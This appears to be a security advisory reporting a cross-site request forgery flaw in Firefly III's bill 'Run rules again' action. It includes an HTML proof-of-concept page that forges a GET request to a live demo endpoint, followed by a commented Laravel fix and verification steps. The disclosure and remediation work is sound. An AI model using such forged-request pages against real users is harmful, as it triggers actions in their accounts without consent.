Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
Valid
Reported on
Oct 23rd 2021
Description
There is a CSRF on the "Run rules again" action.
Proof of Concept
<!-- PoC.html -->
<html>
<body>
<!-- Rewrite the page's own URL to "/" so the Referer header sent with the
     forged request shows only the attacker origin, not the PoC file path. -->
<script>history.pushState('', '', '/')</script>
<!-- The form has no method attribute, so it submits with GET. The rescan
     endpoint accepts GET and requires no CSRF token, so the victim's session
     cookie alone authorises the action on bill 2. -->
<form action="https://demo.firefly-iii.org/bills/rescan/2">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
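The root cause the PoC relies on is that a state-changing action is reachable with a plain GET. Laravel's VerifyCsrfToken middleware (part of the "web" middleware group) skips GET, HEAD and OPTIONS requests entirely, so no token is ever checked on such a route, and a cross-site form submission, or even an <img src>, carries the victim's session cookie with it. The following is an added illustration of the usual fix, not Firefly III's own code: the route, controller and view names are hypothetical stand-ins, and the real application uses Twig templates rather than the plain PHP template shown here.

```php
<?php
// Added illustration of moving a state-changing action off GET and under
// Laravel's CSRF middleware. Not Firefly III's code; BillRescanController,
// the route shape and the 'bills.show' route name are assumptions.

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

// routes/web.php

// Vulnerable shape (what the PoC exploits), shown only for comparison and
// deliberately left unregistered. A GET route is never covered by
// VerifyCsrfToken, so <form action="/bills/rescan/2"> from any origin works:
//
//   Route::get('/bills/rescan/{bill}', [BillRescanController::class, 'rescan']);

// Hardened shape: same handler, POST only. The web group's VerifyCsrfToken
// middleware now rejects any request (HTTP 419) that does not carry a _token
// matching the victim's session. The GET route must be removed, not merely
// supplemented, or the original hole stays open.
Route::post('/bills/rescan/{bill}', [BillRescanController::class, 'rescan'])
    ->middleware('web');

class BillRescanController
{
    public function rescan(Request $request, int $bill)
    {
        // ... re-run the rules for bill $bill (application logic omitted) ...
        return redirect()->route('bills.show', [$bill]);
    }
}

// The button that triggers the action must become a POST form carrying the
// session's token. Shown as a plain PHP template; Firefly III uses Twig.
?>
<form method="POST" action="/bills/rescan/<?= (int) $bill ?>">
    <input type="hidden" name="_token" value="<?= e(csrf_token()) ?>">
    <button type="submit">Run rules again</button>
</form>
<?php
// Defence in depth: config/session.php 'same_site' => 'lax' (Laravel's
// default since 7.x) makes browsers withhold the session cookie on cross-site
// POSTs, but NOT on top-level cross-site GET navigations such as the PoC's
// form submit. SameSite alone therefore does not fix a GET-based action;
// the method change plus the token check is what closes it.
```

When checking a fix like this, confirm that a GET to the rescan URL no longer performs the action (it should 404 or 405), and that a POST without `_token`, or with a token from another session, is rejected with 419 rather than executed.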
We have contacted a member of the firefly-iii team and are waiting to hear back.
show.twig#L99-L129 has been validated
ShowController.php#L83-L97 has been validated